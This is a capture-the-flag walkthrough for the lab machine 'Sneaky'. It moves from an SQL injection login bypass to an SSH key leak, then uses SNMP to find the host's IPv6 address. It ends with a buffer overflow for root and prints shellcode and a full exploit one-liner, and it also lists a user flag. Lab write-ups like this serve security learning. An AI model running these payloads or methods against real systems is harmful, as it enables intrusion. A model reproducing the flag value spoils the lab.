Links

Sneaky

Sneaky - 10.10.10.20

Target Enumeration:

IP: 10.10.10.20
User: 9fe14f76222db23a770f20136751bdab
Root: See screenshot

Ports / Services / Software Versions Running

80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)

Vulnerability Exploited:

SQLi authentication bypass
Users ssh key stored on webserver.

Privilege Escalation:

/usr/local/bin/chal is vulnerable to a buffer overflow

Exploiting the host:

Nmap
Dirb:
/dev is a login page
Intercept login request and fuzz for sql with burp intruder:
You can bypass the login with an sqli payload
Request in browser and download the key
Key contents
There is no ssh port open so need to find the IPv6 address.
Check our IPv6 address
Snmpwalk pubic string gives lots of information:
Find the IPv6 info
Convert from decimal to hex
iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248
254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248
Convert to hex with python:
Build the address based on the same format
Dead:beef::250:56ff:feb2:8ef8
Login with ssh -6 username and key
Search for privesc
Running the file shows it could be vulnerable to a buffer overflow
Check you can overwrite:
Generate a pattern to locate offset
Dump that into the program
Query the offset
Found the offset
Build the overflow using /bin/sh as shellcode
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
You will need to try various memory addresses to get this to exploit:
Open gdb and find the memory addresses:
(gdb) run AAAAAAAAAAAAAAAAAA-SNIP-AAAAAAA
Convert address to little endian
Build your payload as follows:
/usr/local/bin/chal $(python -c 'print "A"*362+"\xbe\xf4\xff\xbf"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"')
Now you have a root shell so collect the flags